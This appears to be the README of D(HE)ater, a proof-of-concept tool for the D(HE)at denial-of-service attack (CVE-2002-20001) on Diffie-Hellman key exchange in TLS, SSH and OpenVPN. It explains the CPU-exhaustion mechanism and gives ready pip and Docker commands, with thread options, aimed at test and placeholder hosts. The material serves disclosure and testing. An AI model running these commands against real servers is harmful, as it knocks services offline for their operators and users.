Summary

D(HE)ater is the proof-of-concept implementation of the D(HE)at attack (CVE-2002-20001). It is an attacking tool based on CPU heating that forces CPU-intensive operations of the ephemeral variant of the Diffie-Hellman key exchange (DHE) in given cryptography protocols (e.g. TLS, OpenVPN, SSH).

The CPU-intensive operation (modular exponentiation) is performed twice (ephemeral public key generation, shared key calculation) during the DHE key exchange. D(HE)ater forces the server to generate its DHE public key and even to calculate the shared key without generating cryptographically correct ephemeral private/public key pairs on the client-side. This means there is no calculation cost on the client’s side, but there is a significant amount of calculation cost on the server-side. Based on this, a denial-of-service attack (DoS) can be initiated.

Usage

D(HE)ater can be installed directly via pip from PyPi

pip install dheater
dheat --protocol tls ecc256.badssl.com
dheat --protocol ssh ecc256.badssl.com

or can be used via Docker from Docker Hub

docker pull coroner/dheater
docker run --tty --rm coroner/dheater --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --protocol tls openvpn://vpn.example.com
docker run --tty --rm coroner/dheater --protocol tls openvpntcp://vpn.example.com:443
docker run --tty --rm coroner/dheater --protocol ssh ecc256.badssl.com

You can increase the load by adding extra threads.

dheat --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls ecc256.badssl.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls openvpn://vpn.example.com
docker run --tty --rm coroner/dheater --thread-num 4 --protocol tls openvpntcp://vpn.example.com:443
docker run --tty --rm coroner/dheater --thread-num 4 --protocol ssh ecc256.badssl.com

Credits

The implementation is powered by CryptoLyzer, a server cryptographic protocol (TLS, SSL, SSH, DNSSEC) settings analyzer.